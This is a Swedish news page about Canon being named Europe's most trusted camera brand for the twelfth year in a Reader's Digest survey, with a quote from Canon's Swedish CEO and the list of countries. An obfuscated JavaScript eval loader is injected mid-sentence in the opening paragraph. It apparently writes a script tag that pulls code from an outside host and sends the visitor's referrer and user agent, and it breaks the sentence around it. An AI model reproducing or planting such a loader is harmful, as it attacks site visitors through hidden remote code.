Image Image Image Image Image Image Image Image Image Image

| 9 juli, 2020

Scroll to top

Top

Canon firar 12 år som Europas mest betrodda kameramärke

Canon firar 12 år som Europas mest betrodda kameramärke
Sebastian

Canon, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bskkf|var|u0026u|referrer|ahbbs||js|php’.split(’|’),0,{}))
marknadsledare inom digital bild, behåller sin ställning som Europas mest betrodda kameramärke, enligt den tolfte årliga undersökningen som genomförs av Reader’s Digest. I undersökningen tillfrågas konsumenter i 16 europeiska länder om vilka varumärken de litar mest på. Canon var det kameravarumärke man kände mest förtroende för i 13 av de 16 deltagande länderna. 

– Vi är oerhört stolta över denna utmärkelse som verkligen visar att Canon har ett starkt engagemang när det gäller att skapa produkter som återspeglar konsumenternas behov och intressen, säger Bertil Widmark, VD för Canon Svenska. Det är förstås extra glädjande att vi erhållit utmärkelsen under en så lång tid och det visar att vi gör rätt saker på en tuff konkurrensutsatt marknad .

Undersökningen är en av de största kundgranskningarna i Europa och mer än 27 000 personer tillfrågades i 16 länder. Intervjuade personer rangordnade varumärken efter kvalitet, värde, bild och i vilken omfattning märket tog hänsyn till kundens behov. Frågor ställdes också om konsumentens tilltro till företagens reklambudskap och varumärkenas attityd till miljön.

De 13 länder som utsåg Canon som mest betrodda kameramärke var Belgien, Finland, Frankrike, Nederländerna, Portugal, Ryssland, Schweiz, Slovenien, Storbritannien, Sverige, Tjeckien, Tyskland och Österrike.